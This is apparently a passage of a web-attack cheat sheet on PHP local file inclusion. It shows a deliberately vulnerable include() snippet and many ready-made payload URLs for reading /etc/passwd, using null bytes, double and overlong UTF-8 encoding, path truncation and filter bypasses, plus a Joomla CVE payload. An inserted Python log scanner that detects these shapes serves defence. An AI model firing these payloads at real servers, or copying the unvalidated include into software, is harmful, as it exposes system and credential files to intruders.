```php
<?php
// Vulnerable: the user-controlled "page" parameter is passed straight to include()
$file = $_GET['page'];
include($file);
?>
```

In the following examples we include the /etc/passwd file; see the Directory & Path Traversal chapter for more interesting files.

<http://example.com/index.php?page=../../../etc/passwd>

## Null Byte

⚠️ In PHP versions below 5.3.4 the path can be terminated with a null byte (%00).

<http://example.com/index.php?page=../../../etc/passwd%00>

Example: Joomla! Component Web TV 1.0 - CVE-2010-1470

{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00

## Double Encoding

<http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd>
<http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00>

## UTF-8 Encoding

<http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd>
<http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00>

## Path Truncation

On most PHP installations a filename longer than 4096 bytes is truncated, so any excess characters are silently discarded.

```
http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE]
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd
```

## Filter Bypass

<http://example.com/index.php?page=....//....//etc/passwd>
<http://example.com/index.php?page=..///////..////..//////etc/passwd>
<http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd>
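As an added defensive example (not part of the original page), the Python below canonicalises query values the way a log analyser or WAF should before checking them, so the encoding variants listed above (null byte, double encoding, overlong UTF-8, `....//` and `%5C` tricks) all collapse to the same traversal shape; the access-log format and the `OVERLONG` table are assumptions made for the example.

```python
import re
from urllib.parse import unquote

OVERLONG = {"%c0%ae": ".", "%c0%af": "/"}  # overlong UTF-8 for '.' and '/' (constructed table)

def normalize(raw: str, rounds: int = 4) -> tuple[str, bool]:
    """Decode until stable (beats double encoding), map overlong UTF-8, drop NUL, unify and collapse slashes."""
    v = raw
    for _ in range(rounds):
        step = v
        for enc, ch in OVERLONG.items():
            step = re.sub(re.escape(enc), ch, step, flags=re.I)
        step = unquote(step)
        if step == v:
            break
        v = step
    nul_seen = "\x00" in v
    v = v.replace("\x00", "").replace("\\", "/")
    return re.sub(r"/+", "/", v), nul_seen   # "..///////.." -> "../.."

def is_traversal(raw: str) -> bool:
    """Flag a dots-only segment of length >= 2 ('..', or the '....' left by '....//') or an embedded NUL."""
    path, nul_seen = normalize(raw)
    dotted = any(len(s) >= 2 and set(s) == {"."} for s in path.split("/"))
    return dotted or nul_seen

REQ = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
def scan_log(lines):
    """Return (raw_value, canonical_path) per suspicious query value; the query is split by hand so values stay encoded."""
    hits = []
    for line in lines:
        m = REQ.search(line)
        if not m or "?" not in m.group(1):
            continue
        for pair in m.group(1).split("?", 1)[1].split("&"):
            value = pair.partition("=")[2]
            if is_traversal(value):
                hits.append((value, normalize(value)[0]))
    return hits

# Constructed access-log lines built from the payload shapes shown above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=../../../etc/passwd%00 HTTP/1.1" 200 1420',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1420',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 1420',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1420',
    '10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=/%5C../%5C../etc/passwd HTTP/1.1" 200 1420',
]
```

Calling `scan_log(SAMPLE_LOG)` flags five of the six constructed requests (only `page=home` passes), each paired with its canonical `../...` form for the alert.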

## Remote File Inclusion

Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.

Remote File Inclusion no longer works on a default configuration, because allow_url_include has been disabled by default since PHP 5.